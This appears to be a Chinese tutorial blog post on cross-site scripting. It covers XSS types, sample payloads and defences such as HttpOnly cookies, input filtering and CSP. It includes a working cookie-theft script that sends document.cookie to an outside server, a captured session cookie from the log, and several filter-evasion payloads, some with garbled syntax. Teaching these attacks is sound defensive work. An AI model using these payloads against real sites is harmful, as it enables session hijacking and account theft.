跨站脚本攻击(XSS)

最新推荐文章于 2020-10-01 23:56:18 发布
最新推荐文章于 2020-10-01 23:56:18 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ryron/article/details/72819018
版权

XSS

Cross Site Scripting(跨站脚本攻击)是客户端脚本安全中的头号大敌,它通过在页面中注入脚本,然后触发执行,获取相应的权限。

xss 攻击危害

  • 获取Cookie
  • 网络钓鱼
  • 劫持会话
  • 传播xss蠕虫

xss攻击分类

反射型XSS

反射型XSS只是简单地把用户输入的数据“反射”给浏览器。黑客往往需要诱惑用户“点击”一个恶意链接,才能攻击成功。

存储型

存储型XSS会把用户输入的数据“存储”在服务器,这种XSS具有很强的稳定性。

基于DOM

从效果来说也是一种反射型XSS

image

常见XSS(html/css/js/DOM)

XSS获取Cookie
在html注入<script src="http://192.168.31.235:3001/javascripts/evil.js"></script>

// evil.js
var img = document.createElement('img');
img.src = 'http://192.168.31.235:3001/log?cookie=' + escape(document.cookie);
document.body.appendChild(img);

执行js,文档加载图片,同时把document.cookie发送到3001服务器。
3001后台日志

GET /log?cookie=connect.sid%3Ds%253AReYs6tnBdRPPwl_u9-c3OXwpRMtJ6QIE.BFbYfuwr0jt%252FgwigBOxHWJJi691rN3YUCUM34CxJGlg

Cookie保存当前用户的登陆凭证,若丢失,后果不堪设想。

正常注入(src、Javascript)

<img src="javascript:alert(/xss/)" width="100">

事件注入

<img src="#" onerror="alert('xss')" width="100">

<div onclick="alert('')"></div>

通过css构造(background-img:url\expression\link-href\@import)

<div style="background-image: url(javascript:alert('xss'));"></div>
<style>body{background-image: url("javascript:alert('xss')");}</style>

通过Javascript构造(eval()函数、ASCII编码)

<script>eval("alert('xss')")</script>
<im src="javascript:eval(String.formCharCode(97.....))"

基于DOM型创建(有字数限制的输入框)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'alert('</script>
<script>z=z+'/xss/)'</script>
<script>z=z+'");'</script>
<script>eval(z)</script>

基于DOM型创建(创建节点)

var a = documentcreateElement('script';
a.src="http://....js");
document.getElementsByTagName("head")[0].appendChild(s);

image

XSS防御

image

HttpOnly

设置HpptOnly后浏览器禁止脚本通过document.cookie访问Cookie
express-session为例

app.use(session({
  secret: 'keyboard cat',
  cookie: {
    maxAge: 60000 ,
    httpOnly: true  // 默认true
    }
}))

XSS过滤脚本

XSS攻击者通常构造一些特殊字符进行攻击,所以输入过滤是必要的。
参考jsxss
可以在浏览器及node后端使用。
特性
- 白名单控制允许的HTML标签及各标签的属性
- 通过自定义处理函数,可对任意标签及其属性进行处理

Content Security Policy 网页安全政策

参考阮一峰老师博客

如果还想了解更多XSS攻击类型,可以查看http://pkav.net/XSS.png。以上图片来源于web前端安全与实践 龙付成老师课堂

参考资料

Ryron
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS(脚本攻击)详解
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 脚本攻击XSS(Cros...
XSS脚本攻击
01-27
脚本(crosssitescript)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网没有对用户提交数据...
脚本漏洞
weixin_46729085的博客
09-08 3730
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
浅谈XSS脚本攻击
若水弹丸之地
12-04 1万+
 浅谈 脚本攻击(XSS) 一、概述 1、什么是脚本攻击 脚本攻击(Cross Site Scripting),简称XSS,  是指:由于网程序对用户输入过滤不足,致使攻击者利用输入可以显示在页面上对其他用户造成影响的代码来盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 直白点:恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时...
XSS脚本攻击剖析与防御
Tasfa的博客
10-08 9623
XSS脚本攻击剖析与防御 》读后想法         这几天是把《XSS脚本攻击剖析与防御 》这本书给看完了,有一些想法想分享一下,纯属个人意见,不喜勿喷!         对于新手来说(0基础),我觉得这应该是一本很不错的书,他能够带你全面详细的了解XSS的知识,当然,强烈建议想开始看这本书的人,一定要先把Web基础打扎实再看,特别是javascript和php语言,否则比
脚本攻击XSS(Cross Site Script)的原理与常见场景分析
10-18
XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的...这篇文章主要给大家介绍了关于脚本攻击XSS(Cross Site Script)的原理与常见场景的相关资料,需要的朋友可以参考下。
解析如何防止XSS脚本攻击
01-31
这些规则适用于所有不同类别的XSS脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在...
XSS脚本攻击过程最简单演示
热门推荐
smstong的成长轨迹
02-06 8万+
实例演示XSS攻击全过程。
脚本攻击实例解析
06-08
此文档是本人亲自整理过的相对通俗易懂的一个脚本攻击实例解析
SQL注入攻击PPt
12-02
SQL注入攻击概述及防御,为网络安全进行防御。里面主要讲解SQL注入原理,及攻击过程,和防御措施。
Xss脚本安全技术
04-01
xss脚本的技术指南,详细描述了脚本的集中不同的类型和危害网的原理
脚本攻击交流ppt
10-02
脚本攻击交流的ppt,可参考 ppt
Web应用的安全攻防之脚本攻击(XSS)
08-23
Web应用的安全攻防之脚本攻击(XSS)Web应用的安全攻防之脚本攻击(XSS)
XSS攻击
尊哥的博客
08-09 244
XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。...
XSS系列一:什么是XSS攻击
川端小树的博客
10-01 2810
1.关于XSS攻击 XSS全称Cross Site Scripting(脚本),为了与“CSS”区别,就使用XSS作为简称。 XSS攻击指恶意用户在html中注入含恶意的JavaScript代码或者恶意的HTML代码。在其他用户浏览该页面时,浏览器会直接编译处理所有代码包括恶意代码,从而作出损害用户利益的攻击。 下面通过一个简单的前后端数据交互例子进行叙述,先贴上代码 //页面代码 <!DOCTYPE html> <html> <head> <
XSS(脚本攻击)相关内容总结整理
阿飞云漫步
09-01 1427
XSS攻击相关资料整理 文章目录XSS攻击相关资料整理脚本攻击XSS)XSS 简介XSS 危害XSS 原理XSS 分类XSS 防御总结XSS 问答参考资料 脚本攻击XSS) XSS 简介 人们经常将脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将脚本攻击缩写为XSS脚本攻击XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户
简述脚本攻击XSS的工作原理
最新发布
05-10
脚本攻击XSS)是一种利用Web应用程序中的漏洞,将恶意脚本注入到受害者浏览器中的攻击方式。攻击者通过在目标网中注入恶意脚本,使得用户在浏览网时执行该脚本,从而达到攻击目的。 XSS攻击的工作原理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值